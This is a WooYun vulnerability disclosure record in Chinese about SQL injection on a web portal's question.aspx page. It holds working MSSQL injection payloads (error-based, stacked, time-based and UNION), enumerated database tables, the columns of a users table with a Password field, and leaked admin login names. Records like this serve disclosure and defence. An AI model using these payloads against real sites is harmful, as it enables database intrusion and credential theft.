漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0131604
漏洞标题:万户网络主站SQL注入漏洞一枚
相关厂商:cncert国家互联网应急中心
漏洞作者: jobf
提交时间:2015-08-12 12:46
修复时间:2015-09-26 14:38
公开时间:2015-09-26 14:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-12: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开
简要描述:
RT
详细说明:
万户网络SQL注入漏洞,注入点为:http://**.**.**.**/zhidao/question.aspx?pid=18
漏洞证明:
Parameter: pid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pid=18' AND 1227=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1227=1227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(98)+CHAR(113))) AND 'rEWO'='rEWO
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: pid=18';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: pid=18' WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: pid=18' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(90)+CHAR(78)+CHAR(83)+CHAR(84)+CHAR(116)+CHAR(74)+CHAR(89)+CHAR(100)+CHAR(104)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: ReportServerTempDB
[9 tables]
+-----------------------------------------------------+
| ChunkData |
| ChunkSegmentMapping |
| ExecutionCache |
| PersistedStream |
| SegmentedChunk |
| SegmentedChunk |
| SessionData |
| SessionLock |
| SnapshotData |
+-----------------------------------------------------+
Database: msdb
[136 tables]
+-----------------------------------------------------+
| MSdatatype_mappings |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfilegroup |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary_databases |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| syscollector_blobs_internal |
| syscollector_collection_items_internal |
| syscollector_collection_items_internal |
| syscollector_collection_sets_internal |
| syscollector_collection_sets_internal |
| syscollector_collector_types_internal |
| syscollector_collector_types_internal |
| syscollector_config_store_internal |
| syscollector_config_store_internal |
| syscollector_execution_log_full |
| syscollector_execution_log_full |
| syscollector_execution_log_internal |
| syscollector_execution_stats_internal |
| syscollector_execution_stats_internal |
| syscollector_tsql_query_collector |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobstepslogs |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments_transfer |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profileaccount |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_logdetail |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_server_groups_internal |
| sysmanagement_shared_server_groups_internal |
| sysnotifications |
| sysoperators |
| sysoriginatingservers_view |
| sysoriginatingservers_view |
| syspolicy_conditions_internal |
| syspolicy_conditions_internal |
| syspolicy_configuration_internal |
| syspolicy_configuration_internal |
| syspolicy_execution_internal |
| syspolicy_facet_events |
| syspolicy_management_facets |
| syspolicy_object_sets_internal |
| syspolicy_object_sets_internal |
| syspolicy_policies_internal |
| syspolicy_policies_internal |
| syspolicy_policy_categories_internal |
| syspolicy_policy_categories_internal |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal |
| syspolicy_system_health_state_internal |
| syspolicy_system_health_state_internal |
| syspolicy_target_set_levels_internal |
| syspolicy_target_set_levels_internal |
| syspolicy_target_sets_internal |
| syspolicy_target_sets_internal |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules_localserver_view |
| sysschedules_localserver_view |
| syssessions |
| sysssislog |
| sysssispackagefolders |
| sysssispackages |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
+-----------------------------------------------------+
Database: Whir_ezEIP4_oagw20150212
[113 tables]
+-----------------------------------------------------+
| Whir_Cmn_Area |
| Whir_Cnt_Attached |
| Whir_Cnt_CreateLog |
| Whir_Cnt_Relation |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectColumn |
| Whir_Cnt_WorkFlowLogs |
| Whir_Dev_Column |
| Whir_Dev_ConfigStrategy |
| Whir_Dev_Field |
| Whir_Dev_FormArea |
| Whir_Dev_FormArea |
| Whir_Dev_FormDate |
| Whir_Dev_FormOption
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: Whir_ezEIP4_oagw20150212
Table: Whir_Sec_Users
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CreateDate | datetime |
| CreateUser | nvarchar |
| Email | nvarchar |
| IsDel | bit |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LoginName | nvarchar |
| LoginType | nvarchar |
| Password | nvarchar |
| RealName | nvarchar |
| Remarks | nvarchar |
| RolesId | int |
| Sort | bigint |
| State | int |
| SystemLanguage | int |
| SystemSkin | nvarchar |
| UpdateDate | datetime |
| UpdateUser | nvarchar |
| UserId | int |
+----------------+----------+
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: Whir_ezEIP4_oagw20150212
Table: Whir_Sec_Users
[5 entries]
+-----------+
| LoginName |
+-----------+
| admin |
| bjhr |
| gzwhir |
| jiangdx |
| root |
+-----------+
修复方案:
过滤
版权声明:转载请注明来源 jobf@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2015-08-12 14:37
厂商回复:
CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。
最新状态:
暂无